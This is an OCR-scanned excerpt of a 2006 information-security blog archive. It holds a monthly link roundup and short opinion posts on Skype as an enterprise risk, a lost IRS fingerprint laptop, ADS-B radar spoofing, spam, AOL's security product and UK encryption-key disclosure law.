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5. http: //www.computerworld.com.au/index.php/id; 1864876489; fp;2;fpid; 

6. http: //www.computerworld.com.au/index.php/id; 405694618; fp; 16;fpid;0 

7. http://ddanchev. blogspot .com/2005/12/insiders-insights-trends-and-possible. html 
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. http: //english.people.com.cn/200605/31/eng20060531_ 269908. htm 
. http://gaxed.com/ 


2.6 June 


2.6.1 May’s Security Streams (2006-06-03 12:29) 


Here’s May’s summary of all the security streams during the month. This is perhaps among 
the few posts in which | can actually say something about the blog, the individual behind it, 
and its purpose, which is to - question, provoke, and inform on the big picture. After all, "/ 
want to know God’s thoughts... all the rest are details", one of my favorite [1]Albert Einstein’s 
quotes. The way we often talk about a false feeling of security, we can easily talk about a 
false feeling of blogging, and false feeling of existence altogether. It is often assumed that 
the more you talk, the more you know, which is exactly the opposite, those that talk know 
nothing, those that don’t, they do. There’s nothing wrong with that of [2]refering to yourself, 
as enriching yourself through past experience helps you preserve your own unique existence, 
and go further. Awakening the full potential within a living entity is a milestone, while self 
preservation may limit the very development of a spirit - or too much [3]techno thrillers 
recently? :) 


It’s great to see that a knowledgeble audience has become a daily reality at this blog, 
it’s never too late to meet new friends or their pseudo personalities. I’ve also included this 
month’s stats area graph so you can get a grasp of the activity, go through past summaries 
for - [4]January, [5]February, [6]March and [7]April, in case your brain is hungry for more 
knowledge. 


It is my opinion that the more uninformed the end user is, the less incentive for the 
vendors to innovate at the bottom line, and on the other hand, it is also easier for a vendor 
to put emphasize on current trends, instead of emerging ones - which is what is going to add 
value to its propositonin the long-term. It’s more profitable to treat the disease, instead of 
curing it. And while curing one doesn’t mean curing all, it’s a progress. So, | inform both sides 
and everyone in between. Information has never been free, but it wants to be free, so enjoy, 
[8]syndicate, and keep yourself [9]up-to-date with my perception on information warfare and 
information security, even when I’m not blogging, but just linking! 


01. [10]Biased Privacy Violation 


While the site’s niche segment has a lot of potential, | doubt it would scale enough to 
achieve its full effect. Providing Ex-couples with the microphone to express their attitudes is 
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as quistionable as whether playing 3D shooters actually limits or increases violance. 


02. [11]Travel Without Moving - Typhoon Class Submarines 


There’re a lot of strategic security issues going beyond the information security market, 
and that is the defense and intelligence community’s influence on the world. What used to be 
a restricted, or expensive practice, satellite imageryis today’s Google Earth/Maps’s service on 
a mass scale, anyone can zoom in front of the NSA. And as it’s obvious you can spot things 
you can somehow define as sensitive locations though Google Earth/Maps, the question is so 
what? I’ve managed to dig quite some interesting locations | haven’t seen posted anywhere 
and will be adding them shortly, feel free to suggest a spot if you have something in mind. 
The series in no way compete with the [12]Eyeball-Series.org, though | wish. 


03. [13]The Current State of Web Application Worms 


Web application worms, their potential and possible huge-scale impactis a topic that’s 
rarely covered as an emerging trend by the mainstream media sources. On the other hand, 
over 200 words acticles on yet another malware variant going in depth into how the Internet 
is driving force for the E-commerce revolution, and how a ransomware pience of malware 
is changing this.The problem is rather serious due to the common type of web application 
vulnerabilities huge eyeball aggregators suffer from. Whether it’s speed or infected population 
to use as a benchmarking tool, just like packet-type of worms, web application worms are 
foundamental for the creation of a Superworm beneath the AV sensor’s radar. 


04. [14]Shaping the Market for Security Vulnerabilities Through Exploit Derivatives 


Resoucesful post providing overview of the most recent developments inthe emerging 
market for software vulnerabilities, and the possibilityto secure future vulnerability releases. 
As Adam at [15]Emergentchaos.com pointed out, the legality of such markets is among the 
cons of the idea, which is perhaps the time to consider the usability of markets for what’s 
turning into a commodity - security vulnerabilities. The major problem which prompts for 
the need of such, is the current "private club" only vulnerability sharing practices among 
the infomediaries, but it can easily be argued that empowering vulnerability diggers, not 
researchers, isn’t the smartest thing the community can do. 


Vendors are often discussed as liable for the vulnerabilities in their software, but it’s like 
blaming a dating service for not generating you dates, my point is that you cannot simply 
blame vendors for the vulnerabilities in their software as it would result in a major slowdown 
of innovation. Think about it, we all hate Bill Gates and use, while trying to avoid Microsoft’s 
products pretty much everywhere, monocultures are bad, we’d better have half the Internet 
using MACs, and the other Windows so there would be an incentive and fair "allocation of 
resources" targeting both sides, as the plain truth is that malicious attackers aren’t just 
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attacking these days, they are gaining scale and becoming efficient. In a free market, where 
market forces invisibly shape and guide it, there’s little room for socially oriented iniciatives 
like these. Today’s software and technologies are shipped to get adapted, that’s insecure ones 
we become dependent on, to later find out we have the live with their insecurities - no one is 
perfect, and being all well-rounded is so boring at the bottom line. 


If we were to start "thinking Security" everywhere, there wouldn’t be anything left in re- 
spect to usability at the end of the day. And as I’ve pointed out in a previous post on 
[16]valuing security, if security doesn’t bring anything tangible, but prevents risks, that’s 
the cornerstone of the problems arising with justifying expenditures. The Internet we’ve 
become so addicted and dependent on wasn’t build with security in mind, but our conscious 
or subconscious marginal thinking gave us no choice, either live with the vulnerabilities and 
take advantage of its benefits, or stop using it at all. If we were to start thinking security 
first, there wouldn’t be Internet at all, at least not in our lifetime. ISPs avoiding to take 
action on customers participating in botnets as they still haven’t managed to find a way to 
commercialize the service, or Microsoft shipping its products in root mode and with all features 
turned on by default, are important points to keep in mind when refering to the practice of 
threatening and not curing deceases. 


You cannot blame vendors for the security vulnerabilities in their software, you can blame 
them for the huge windows of opportunities their lack of action opens, and lack of overal 
commitment towards mitigating the threats posed by these, now, how you would you go 
to turn your day dreaming into a measurable metric, even come up with a benchmark is 
challenging - a challenge ruined by the value of keeping an Oday, a truly Oday one. 


05. [17]The Cell-phone Industry and Privacy Advocates VS Cell Phone Tracking 


There you go with your fully realistic 1984 scenario, | wonder would the idea constitute 
mass surveillance and social networking analysis altogether. DIY alternatives are gaining 
popularity, and the cell phone industry doesn’t really want to be perceived as an "exact 
location"provider, rather communication services. The excuse if it becomes habitual? Well, 
since there’s no Cold War anymore - just sentiments - it’s Terrorism today. 


06. [18]Snooping on Historical Click Streams 


It was about time Google reposition itself as a search company, not as a new media one 
heading towards portalization. There’s nothing wrong with the idea, the realityis they can 
never catch up with Yahoo - and they shouldn’t! Spending some time with the feature, and 
you will be able to verify most of your previous research findings, or come across to surprising 
ones. Do you trust Google and its geolocation services at the bottom line? | do. 
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07. [19]Pass the Scissors 


It’s never too late to earn a buck for printing currency, even in times of inflation in be- 
tween. 


08. [20]ls Bin Laden Lacking a Point? 


Google trends point to Washington DC as the region with the highest interest in [21]Bin 
Laden, not surprising isn’t it? | feel the entire idea of an organizational hierarchy and Bin 
Laden on the top is an oudated thinking, but a marketable one forwarding the entire respon- 
sibility to one person, who at the end of day wouldn’t have any choice but to accept it, even 
though he had nothing to do with something in particular. Leadership is critical, and so is 
possible successorship. An image is worth a thousand words in this case! 


09. [22]Pocket Anonymity 
Harnesing the power of established brands in privacy, encryption and anonymity services and 
providing portability is a great idea, no doubt, but what I’m missing is a targeted market, a 


clear positioning, is it [23]privacy or anonymity provider, as there’s a huge difference between 
the two of these. A free alternative to the idea as well. 


10. [24]Travel Without Moving - Scratching the Floor 


No comment, just awareness. 


11. [25]Terrorist Social Network Analysis 


Seems like social network analysis practices apply to terrorist organizations as well, and 
why wouldn’t they? As you can see, there isn’t big of a different between a Fortune 500 
organization, and a terrorist one, the only problem and downsize is the inability to take 
advantage of the momentum, historical findings out of data mining are useful for power point 
slides seeking further investment, and that’s it. 


12. [26]Valuing Security and Prioritizing Your Expenditures 


Reactive, Proactive, or Adaptive, what’s your security strategy, and what’s your return 
on security investment? 
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13. [27]EMP Attacks - Electronic Domination in Reverse 


Did you know that Stalin was aware of the U.S’s A-bomb, even before Harry Truman was? - the 
consequence of too much secrecy sometimes! EMP attacks get rarely discussed, yet today’s 
portability of these and potential for chaos put them on the top of my watch list. There have 
been numerous ongoing Cybersecurity and critical infrastructure security exercies in the U.S 
for the last couple of years, and while military equipment goes through hardening process, 
Russia remains a key innovator whose capabilities have surpassed their own expectations. 
Cyber warfare is the next Revolution in Military Affairs, and it would be naive not to keep 
thinking of sneaky attacks, the weakest point in an IT and electronics dependent society. 


14, [28]lInsider Competition in the Defense Industry 


Where else, if not in the defense industry? 


15. [29]Techno Imperialism and the Effect of Cyberterrorism 


Today’s public perception of Cyberterrorism is so stereotyped, perhaps due to one basic 
reality - you cannot fight Cyberterrorism, the way you can blow up a cave in Afghanistan, 
and it’s a big problem. While public accountability is easily achieved through Cybersecurity 
exercises, there isn’t a better tool for propaganda, recruitment, communication and research 
than the Internet, and as you’re about to find out, there are ongoing initiatives to crawl the 
Web for terrorist web sites, analyze terrorist speaking communication patters on web forums, 
and how encryption, flight simulator programs are an unseperable reality of the concept. 


As the conspiracy theorist inside me is screaming, there used to be a speculation how 
Disney on purposely brainwashed the perception of UFOs in its content, to make it more 
user-friendly excuse, and put everyone who’s talking the opposite turns into the usual "that’s 
the guy that has seen them" unfavorable position. Today’s coverage on Cyberterrorism 
doesn’t provoke discussion, instead it always tries to communicate and question the credibility 
of the idea, with the usual scenarios relating to SCADA devices, terrorists melting down power 
plants and the rest of the science-fiction stories. In all my posts on Cyberterrorism, a topic 
I’ve been actively writing on, and following for some years, | always point out that terrorists 
are not rocket scientists unless we make them feel so - or have benefits to think they are. 


16. [30]Travel Without Moving - Cheyenne Mountain Operations Center 
Cheyenne Mountain Operations Center from Google Maps, and a summary of a report 


onGoogle Earth’s security implications, | hope you’ll manage to get your hands on, the way | 
did through a friend. 
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17. [31]Nation Wide Google Hacking Initiative 


| like the idea of auditing a nation’s cyber space through Google Hacking, the only prob- 
lem is communicating the value to public and to the companies/sites. What can be defined 
as sensitive information leaked through Google, and who’s the attacker? Is it a script kiddie, 
a google hacker, a foreign intelligence personel, or foreign company conducting unethical 
competitive intelligence? Knowing, or at least theorizing on the possible adversaries will lead 
your auditing practices to an entirely new level. 


18. [32]Espionage Ghosts Busters 


No government is comfortable with having to smile at Chinese people, or how their economy 
is evolving from supplier to manufacturer, still there isn’t any serious ground for this case - 
besides and uncomfortability issue. 


19. [33]Arabic Extremist Group Forum Messages’ Characteristics 


Great research on today’s fully realistic scenario of terrorists communicating over the 
Web, the public one, as basic authentication would have stopped such automated approaches 
for sure. What can you actually find with that type of intelligence, real terrorists commu- 
nications, or growing propaganda sentiments, in between pro-democratic individuals to be 
recruited? 


20. [34]The Current, Emerging, and Future State of Hacktivism 
A very well researched dissertation, a lot of visionary thoughts while it goes back to the 
basics. It is doubtful whether hacktivism would cease to exist despite the for-profit malicious 


attacks these days, as anarchists, governments, patriots or script kiddies, they all have an 
Opinion on how things should be. 


21. [35]Bedtime Reading - The Baby Business 


What’s a "better" kid, and why you don’t need one? Controllable uncertainty can be ex- 
citing sometimes, but as always, life’s too short to live with uncertainty! 


22. [36]Travel Without Moving - Korean Demilitarized Zone 


A post with an emphasis on North Korea, which as a matter of fact got recently [37]a 
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decline from the U.S on two-way talks on whether the U.S would condemn their nuclear 
program. As I’ve pointed out, there are just looking for attention, while the U.S is sticking to 
six way talks only. Iran truly took advantage of the overly bad publicity for the U.S around the 
world. 


23. [38]Aha, a Backdoor! 


A smart way to fuel growth in homeland security solutions is to be able to exempt pub- 
licly traded companies from reporting these activities, and with the SEC trying to achieve 
better transparency in its data reporting practies, it opens up a huge backdoor for enterprises 
to take advantage of, without any short-term accountability, or transparency requirements for 
the use of their stockholder’s money. It’s the corporate world! 


24. [39]Forgotten Security 


Forgotten what if security plans on a possible assassination to be precise. It’s a like a 
situationwhere a newly graduated wannabe marketer is asked to conduct a marketing re- 
search for a future release of a product, and he just opens his bag and brings out a textbook, 
and starts looking it up. 


25. [40]Delaying Yesterday’s "Oday" Security Vulnerability 


Nothing groundbreaking as this is today’s reality for everyone, and there isn’t such thing as 
a true Oday vulnerability these days. Oday to who, to the media, to the underground, to the 
market, or to the researcher who’s catching up with a week of backlog? 


26. [41]Who’s Who in Cyber Warfare? 


In the future the majority of Cyber wars would be waged by nations, and the maturity 
of their understanding of the concept, and actual capabilities is again going to put the masses 
as a hostage in between. Defensive or offensive motives behind further development, armies 
will be defeated, and battles will be won in Cyberspace - whether by infowar guerilla-fighters, 
corporations, or nations is the beaty of this uncertain growing reality. 


27. [42]No Anti Virus Software, No E-banking For You 


Great idea, lot’s of revenues for the AV vendor, end users with a feeling of security, all 
looks and sounds great, but it isn’t, as these are the basics. An AV solution doesn’t mean 
you won't get hacked, your financial information stolen, and your home PC won’t end up ina 
botnet, it means there’s less chance for it to happen now. Is this campaign worth the publicity 
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and in respect to retaining the bank’s customers? | feel it is, but it’s where the whole process 
of bank2customer safety practices communication begins. 


28. [43]Microsoft in the Information Security Market 


McAfee and Symantec have greatly felt the pressure from Microsoft’s ambitions, as they’ve 
simultaneously released information on their alternatives of OneCare, all-in-one security and 
PC tunning for the masses. Moreover, IP violation suits and the rest truly represent the threat, 
and while | don’t see any, | avoid the fact that this is what the end user really needs. And with 
all the buzz about OneCare, Microsoft’s distribution channels, channel partners and strategic 
partnerships, it would be hard for them to stop using OneCare in an year. That’s why McAfee, 
and Symantec’s releases of alternatives neatly ruined the pionner position Microsoft could 
have taken. Now it’s the same old information security market, the one you’re so comfortable 
with, McAfee and Symantec providing security solutions as their first priority, and Microsoft, 
positioned as a follower catching up. Smart move! 


29. [44]Covert Competitive Intelligence 


With enterprises considering key extranet participants as potential attack vectors, and 
web-integration of backend systems as potential targets, insiders are benefiting from within. 
Dealing with "hackers", malware, firewalls configuration etc. is part of the problem of perime- 
ter based and application based defense. Consider taking into consideration, organizational 
threats such as insiders, and figure out a cost-effective way of dealing with this hard to detect, 
measure and secure against threat. 


30. [45]The Global Security Challenge - Bring Your Know-How 


How would you be more creative, knowing how much is your budget and trying to allo- 
cate it for the idea of allocating it, or coming up with the idea first and then trying to 
commercialize it? Budget allocation is a daily practice, but the way it empowers, the very 
same way it wastes resources, ones usually wrongly allocated. 


[46]Healthy Paranoia 


| really feel you. 


1. http://w brainyquote, con/quotes/quotes/a/aTberteinei 48896 eal 
2, htep: //nind, sourceforge net/ ogo al] 

3. http: //cyberpunkreview.com/ 

4, http://ddanchey.blogepot .con/2006/04/janzys-security-stveane_ heal 
5. heap: / /ddanchev. blogspot .com/2006/03/februarys-security-streans.neal 
6. heap: /ddanchev.blogapot.com/2006/03/aairchs-security- streams. html 
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14. http://ddanchev. blogspot .com/2006/05/shaping-market-for-security.htm 
15. http://www. emergent chaos .com/archives/2006/05/economics_of_vulnerabilit.htm 


16. http://ddanchev. blogspot .com/2006/05/valuing-security-and-prioritizing-your.htm 


17. http://ddanchev. blogspot .com/2006/05/cell-phone- industry-and-privacy.htm 
18. http://ddanchev. blogspot .com/2006/05/wiretapping-voip-order-questioned. htm 
. http://ddanchev. blogspot .com/2006/05/pass-scissors.htm 


ttp://ddanchev. blogspot .com/2006/05/is-bin-laden-lacking-point.htm 
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ttp://ddanchev. blogspot .com/2006/05/valuing-security-and-prioritizing- your .htm 
ttp://ddanchev. blogspot .com/2006/05/emp-attacks-electronic-domination-in.htm 


ttp://ddanchev. blogspot .com/2006/05/insider-competition-in-defense.htm 


29. http://ddanchev. blogspot . com/2006/05/techno-imperialism-and-effect-of .htm 
30. http://ddanchev. blogspot . com/2006/05/travel-without-moving- cheyenne. htm 


ttp://ddanchev. blogspot .com/2006/05/nation-wide-google-hacking-initiative.htm 


32. http: //ddanchev. blogspot . com/2006/05/espionage- ghosts-busters.htm 
. http://ddanchev. blogspot .com/2006/05/arabic-extremist- group-forum-messages. htm 
34. http://ddanchev.blogspot .com/2006/05/current- emerging-and-future-state-of .htm 


ttp://ddanchev. blogspot .com/2006/05/bedtime-reading-baby- business . htm 


ttp://ddanchev. blogspot .com/2006/05/travel-without-moving-korean_27.htm 


ttp://abcasiapacific.com/news/stories/asiapacific_stories_1653722.htm 


38. hrtp: //ddanchev. blogspot .co#/2006/06/aha-ackdcor. neal 

| http:/ /adanchey. blogepot .con/2006/05/forgotven- security. htall 
40. hep: //ddauchev. blogspot. cok/2006/05/delay ng-yesterdays-Oday-security hal 
| http://ddanchev. blogepot con/2006/05/shos- ho-in- cyberwarfare. html 


ttp://ddanchev. blogspot .com/2006/05/no-anti-virus-software-no-e-banking .htm 


ttp://ddanchev. blogspot .com/2006/05/microsoft-in-information-security.htm 


44. http://ddanchev. blogspot .com/2006/05/covert-competitive-intelligence.htm 
45. http://ddanchev. blogspot .com/2006/05/global-security-challenge-bring-your.htm 
. http://ddanchev. blogspot .com/2006/05/healthy-paranoia.htm 


2.6.2 Travel Without Moving - KGB Lubyanka Headquarters (2006-06-04 17:26) 


Yet another [1]hot spot in this week’s [2]Travel Without Moving series - this time it’s 
[3]Lubyanka Square’s KGB Headquarters. There are still lots of Cold War sentiments in the air 
among yesterday’s and today’s super powers and you just can’t deny it. [4]Today’s [5]FSB, 
the successor to the [6]KGB, is taking a very serious approach towards [7 ]counter-intelligence, 
and [8]offensive scientific intelligence practices in a much more synergetic relationship with 
the academic world compared to years ago. While the CIA is undisputably the most popular 
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foreign intelligence agency, and more of a front end to the NSA itself from my point of view, 
the KGB still remains reponsible for very important and "silent" moments in the world’s 
history. There were moments in the very maturity of the Cold War, when both, the CIA, and 
the KGB were on purposely disinforming their operatives in order to keep them motivated 
and fuel the tensions even more, but compared to the CIA with its technological know-how, 
[9]KGB’s HUMINT capababilities didn’t get surpassed by technologies. Among the key success 
factors for the intelligence agency was the centralized nature of the command of chain, total 
empowerment, common and obsessive goal, and clear enemy. 


Today’s trends mostly orbit around : 


- information sharing, that is less complexity among different departments and agencies 
- win-win information sharing among nations 


- offensive and defensive CYBERINT, harnessing the power, or protecting against the threats 
posed by the digital era 


- automated and efficient mass surveillance practices- eliminating "safe heavens" 


In case you really want to go in-depth into what has happened during the last couple of 
decades, [10]Vasilli Mitrohih’s KGB Archives are worth reading. And the true-retro gamers can 
take the role of "Captain Maksim Mikahilovich Rukov, recently transferred to the Department 
P from the GRU after three years’ duty to investigate possible corruption inside the KGB (after 
a former agent turned private eye was found murdered). However, as the plot progresses, 
Rukov finds himself investigating a party hardliner anti-perestroika plot that threatens the life 
of General Secretary Mikhail Gorbachev" while [11]playing [12]KGB - Conspiracy game. 


http: //maps .google.com/maps?t=k&kh1l=enk11=55 . 759875, 37 .627155&spn=0. 005385, 0.014162&0m=1 


1. 

2 
3 

4 
5 

6. 

7. — 

8. 
9. 


ttp://fas.org/irp/world/russia/program/humint . ht 
10. http: //www.amazon.com/gp/product/0465003109/002- 1508184-6724032?v=glance&n=28315 
11. http: //www.abandonia.com/games/93/KGB(akaConspiracy) 


12. http://en.wikipedia. org/wiki/KGB_(computer_game) 
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http: //ddanchev. blogspot .com/2006/02/top-level-espionage-case-in-greece .htm 


ttp://en.wikipedia.org/wiki/KGB 
ttp://en.wikipedia.org/wiki/FAPSI 
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2.6.3 Skype as the Attack Vector (2006-06-04 17:52) 


It’s often hard to actually measure the risk exposure to a threat, given how overhyped certain 
market segments/products’ insecurities get with the time. Gartner, and the rest of the popular 
marketing research agencies seem to be obsessed with [1]Skype as the major threat to 
enterprises, while Skype [2]isn’t really bad news, [3]compliance is, in respect to [4]VoIP, P2P, 
IM and Email communications retention or monitoring. From the [5]article : 


"The most recent bug in Skype is another clue to enterprises that they should steer clear of 
the VoIP service, research firm Gartner recently warned. Two weeks ago, Skype patched a 
critical vulnerability that could let an attacker send a file to another user without his or her 
consent, and potentially obtain access to the recipient’s computer and data. This vulnerability 
follows three in 2005 (two high-risk, one low-risk) and highlights the risk of not establishing and 
implementing an enterprise policy for Skype," wrote Gartner research director Lawrence Orans 
in an online research note. "Because the Skype client is a free download, most businesses 
have no idea how many Skype clients are installed on their systems or how much Skype traffic 
passes over their networks." 


There’s a slight chance an enterprise isn’t already blocking Skype, using both, [6]com- 
mercial and [7]public methods wherever applicable. Moreover, it would be much more 
feasible to consider the fact that, if the enterprise - assuming a U.S one - isn’t blocking the 
use of Skype, it must somehow monitor/retain its use in order to comply with [8]standard 
regulations. Skype poses the following problems : 


- inability for the enterprise to retain the IM and VoIP sessions in accordence with regula- 
tions 


- wasted bandwidth costing loss productivity and direct cash outflows, slowdown for criti- 
cal network functions 


- covert channels possibilities 


Several months ago, Skype was also discussed as a [9]command’n’control application 
for botnets, while [10]steganography based communications and [11]plain-simple en- 
crypted/stripped IRCd sessions remain rather popular. Malware authors are actively looking 
for ways to [12]avoid IRC given the [13]popularity it has gained and the experience [14]botnet 
hunters have these days. 


Skype is the last problem to worry about, as in this very same way the recent [15]vul- 
nerabilities in major market leading AVs would have had a higher risk exposure factor as 
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there’s a greater chance of occurrence of malware, than a Skype vulnerability. It’s the 
vulnerabilities in software in principle you have to learn how to deal with, and third-party 
applications that somehow make it on your company’s network. 


More resources : 

[16]Skype Security Evaluation 

[17]Silver Needle in the Skype 
[18]Skype Security and Privacy Concerns 


[19]lImpact of Skype on Telecom Service Providers 


. http: //news.google.com/news?hl=en&ned=us&q=skype/2Bsecurit 


1 

2 
3 

‘ 

5 

6 

7 

8. http://www. windowsecurity.com/articles/How-Do-Compliance-Issues-Affect-your-Network. htm 
9 

10. 

11. 


http: //www.enre.umd.edu/content/rmeyer-assessing. pdf 


. http: //www.symantec.com/avcenter/reference/the.evolution.of .malicious.irc.bots.pdf 


14 
15. 
. http: //www.skype.com/security/files/2005-031/20security/20evaluation. pdf 
17 
18. 
_hetp://ww consnov.con/reports/EVS-Inpact of Skype_on_Tele_Opr=Januaryi0 pl 


2.6.4 Where’s my Fingerprint, Dude? (2006-06-06 19:25) 


[1]Personal data security breaches [2]continue occurring, and with the trend towards evolving 
to a digital economy, it’s inevitably going to get ever worse. In a recently revealed case 
"[3]Lost IRS laptop stored employee fingerprints", from the article : 


"A laptop computer containing fingerprints of Internal Revenue Service employees is 
missing, MSNBC.com has learned. The computer was lost during transit on an airline flight in 
the western United States, IRS sookesman Terry Lemon said. No taxpayer information was 
on the lost laptop, Lemon said. In all, the IRS believes the computer contained information 
on 291 employees and job applicants, including fingerprints, names, Social Security numbers, 
and dates of birth." 
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For the time being the largest accommodator of fingerprints in the world is the U.S.A, 
and this fact affects anyone that enters the U.S. My point is that, given the unregulated ways 
of classifying, storing, transfering and processing such type of information would result in its 
inavitable loss - bad in-transfer security practices or plain simple negligence. 


As we're also heading to a biometrics driven society, the impact of future data security 
breaches will go way beyond identity theft the way we know it - lost and stolen voice patterns, 
DNAs, and iris snapshots would make the headlines. You might also be interested in knowing 
how close that type of "future scenario" really is given the [4]modest genetic database of 3 
million Americans already in existence. 


Things are going to get very ugly, and it’s not the privacy issue that bothers me, but 
the aggregation of such type of data at the first place, and who will get to steal it. It’s perhaps 
the perfect market timing moment to start a [5]portable security solution provider, or resell 
ones know-how under license, of course. 


1. 

2. http://news. google.com/news?hl=en&ned=uskq=data/,2Bbreach&ie=UTF-8 

3. 

‘ 
5 


2.6.5 Phantom Planes in the Skies (2006-06-06 19:37) 


| can barely imagine the panic with a non-responding - can it respond when it’s not there? - 
plane in the sky, at least by the time a visual confirmation reveals the truth. In the post 9/11 
world, airports were among the first strategic targets to get the funding necessary to protect 
against the threats fabricated in a think-tank somewhere. Money are wasted in this very same 
fashion on a daily basis, with no clear ROI, just established social responsibility and common 
sense security. Disinformation can always happen in sky, as "[1]Flaw may lead to air chaos". 
From the article : 


"Hackers armed with little more than a laptop could conjure up phantom planes on the 
screens of Australia’s air traffic controllers using new radar technology, warns Dick Smith. 
The prominent businessman and aviator claims to have found another serious security flaw 
in the new software being introduced into the air traffic control system. He has challenged 
Transport Minister Warren Truss to allow him to set up a demonstration of the problem at 
a test of the technology in Queensland to show how hackers could exploit the automatic 
dependent surveillance broadcasting (ASD-B) system to create false readings on an air traffic 
controller’s screen. The air space activist says he was told of the flaw by US Federal Aviation 
Administration staff." 
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Compared to a speculation | described in a previous post "[2]Why’s that radar screen 
not blinking over there?", these practices are highly natural to [3]ELINT planes/warfare, and 
in the capabilities of experienced staff members as pointed out in the article. Everything is 
buggy, and so is the [4JASD-B system for sure, but the problem from my point of view, is the 
possibility for a "[5]talkative leakage", and the procedures, if any, to internally report bugs 
like these, and get them fixed of course. 


Phantom Warhawk image courtesy of Les Patterson. 


1. http: //australianit.news.com.au/articles/0, 7204, 19375464/5E15331/5E/,5Enbv/,5E15306/%2D15318, 00. htm 


2. http: //ddanchev. blogspot .com/2006/04/whys-that-radar-screen-not-blinking. htm 
3. http: //en.wikipedia.org/wiki/ELIN 


4. http://en.wikipedia. org/wiki/Automatic_Dependent_Surveillance-Broadcast 


5. http: //ddanchev. blogspot .com/2005/12/insiders-insights-trends-and-possible.htm 


2.6.6 Bedtime Reading - Rome Inc. (2006-06-08 17:21) 
If the [1]Baby Business helped you envision the future, "[2]Rome Inc - The Rise and Fall of the 


First Multinational Corporation" is going to help you perceive the past within today’s corporate 
culture - and [3]Stanley Bing makes good points on every stage of the empire. 


Basically, the book emphasizes on the "first multinational corporation" Rome, selling the 
ultimate product of its time - citizenship. Moreover, it goes in-depth into the concept of moguls 
and anti-moguls, and how their tensions indeed create an enterpreneurial and corporate 
culture in 120 A.D. 


Every industry has moguls and anti-moguls, the behind the curtain disruptors at a spe- 
cific stage. What are some of the characteristics of a mogul? 


- Commision their PR 
- Exercise power when feeling endangered - elephants against the mice warfare 


- Indirectly control the media that’s "winning points" for quotations, and "credible" con- 
tent 


- Generally, tend to believe in being the Sun, when the universe tends to have so many 
dwarfs, and dimensions altogether 


- Hide behind C-level positions 
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- Talk more than actually listen 


- When they sneeze the whole industry gets cold 


Certain societies, if not all, get obsessed with superficially creating heroes, so profesion- 
ally that at a certain point, the "hero" cannot deny any of the praises, but starts living with 
them and the load that comes altogether. Get hold of this masterpiece, you’re gonna love it! 


1. http: //ddanchev. blogspot .com/2006/05/bedtime-reading-baby- business. html 
2. http: //www.amazon.com/gp/product/0393060268/002-5173094- 2416853? v=glance&n=28315 
3. http://stanleybing.com/ 


2.6.7. An Over-performing Spammer (2006-06-08 17:32) 


Th3 4r7 Of $3nd!ng spam messages is evolving like never before, and while spammers are 
still catching up with the newest technologies such as [1]VoIP, [2]WiFi, Cell phones - newest 
at least in respect to spamming - trying to avoid the now mature indystry’s practices, and 
taking advantage of the growing economies and their newbie users as victims, is what keeps 
it going. 


| simply couldn’t resist not to share this, seems like this spammer is totally overperform- 
ing himself. How would | fell a victim into this, given | cannot read what I’m about to get 
scammed with? 


Spammers today are in a world of pain when it comes to the industry’s experience in 
detecting their messages, still, soam continues to represent the majority of email traffic 
worldwide, and it’s getting more creative. Images, "marketing" messages that you can barely 
read, old psychological tricks, but still, out of couple of million messages, someone still takes 
it personal, and feels like making a deal online. 


Why spamming works? Because of the ubiquity of email, because of the freely avail- 
able, marketed as fresh, email lists, and at the bottom line, the price for a spammer to send 
couple of million emails is getting lower with botnets on demand becoming a commodity. 
End users, end up sending spam to themselves for being infected with malware. What’s 
next? Spamming is still catching up with the technological posibilities, and Chinese telecom 
operators for instance happen to be the most experienced ones in filtering [3]mobile phones 
spam - guess they’re also over-performing in between [4]censorship. 


ttp://en.wikipedia.org/wiki/Spit_(VoIP_spam) 
ttp://www.vnunet .com/vnunet /news/2122838/spammers-target-wi-securit 


1. 
2. 
3. http://en.wikipedia. org/wiki/Mobile_phone_spam 
4. 


ttp://ddanchev. blogspot .com/2006/02/chinese-internet-censorship-efforts.htm 
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2.6.8 Brace Yourself - AOL to Enter Security Business (2006-06-09 15:49) 


In the re-emergence of the Web, AOL got the attention it never imagined it would get, [1]Mi- 
crosoft and Google fighting for a share of its modest, but strategic amount of eyeballs. After 
being an exclusive part of Time Warner’s balance sheet since its early acquisition, and with 
a [2] $510M fine, dial-up business that was profitable by the time telecoms started offering 
cable connections, due to the years of infrastructure renovation, the though to be mature 
online advertising model is what saved it. Now, AOL is basically putting half its leg into the 
red hot [3]security market and wisely playing it safe as : 


"AOL plans to expand into security services with the release of the Active Security Moni- 
tor, expected on Thursday. The program would also check to make sure Internet Explorer 
is properly configured to prevent security holes. "ASM determines a security score for your 
PC, and for all other PCs in your home network, by evaluating the status of all the major 
components needed for a robust system: Anti-Virus software, Anti-Spyware software, Firewall 
protection, Wireless Security, Operating System, Web Browser, Back up software and PC 
Optimization." 


After the scoring, | presume it would "phone back home" and let AOL know what end 
users are mostly missing, then a solution provided by AOL, or a licensee would follow. Bench- 
marking against AOL’s understanding of application based security is tricky, and | bet you 
already know the programs necessary to establish common sense security on your PC/network. 
Who’s next to enter the security industry besides [4]Microsoft and AOL, perhaps DoubleClick? 


CNET has naturally [5]reviewed the Active Security Monitor. 


1. bttp://www.nytimes.com/2005/12/19/business/media/19aol .htm1?ex=1292648400k%en=98f 969353457b3a4hei=5088kpa 


2. http://www. bizjournals. com/washington/stories/2004/12/13/daily16.htm 


3. http: //www.betanews.com/article/AOL_to_Enter_Security_Business/1149718558 
4. http: //ddanchev. blogspot .com/2006/05/microsoft-in-information-security.htm 
5. http: //reviews.cnet.com/AOL_Active_Security_Monitor/4505-3667_7-31929463.htm1?tag=subna 


2.6.9 All Your Confidentiality Are Belong To Us (2006-06-10 16:49) 


The proof that commercial and open source [l]encryption has surpassed the technologies to 
police it, or the idea that privacy and business growth as top priorities would ruin the whole 
initiative? 


"The Government has launched a public consultation into a draft code of practice for a 
controversial UK law that critics have said could alienate big business and IT professionals. 
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Part Ill of the Regulation of Investigatory Powers Act 2000 (RIPA) will, as it stands, give 
police the authority to force organisations and individuals to disclose encryption keys. The 
Government issued the public consultation on the code of practice for Part Ill, which will 
regulate how police and the courts use powers under the legislation, on Wednesday." 


It would be interesting to see how they would initiate the response from individuals, without 
raising the the eyebrows on the majority of civil liberties watch dogs out there and, of course, 
businessess. That’s of course, assuming they use encryption at the first place. Could be 
much more "wiser" to take advantage of covert practices to obtain the necessary information, 
instead of "forcing" this measure - detecting encrypted/covert communication channels is 
another topic. Moreover, compared to the Australian [2]police whose capabilities of obtaining 
information on criminals include the use of spyware is a bit contraversial, but adaptave 
approach. 


If national infrastructure security matters, have individuals and enterprises personally 
take care of their security and encryption keys, promote data encryption, instead of dictating 
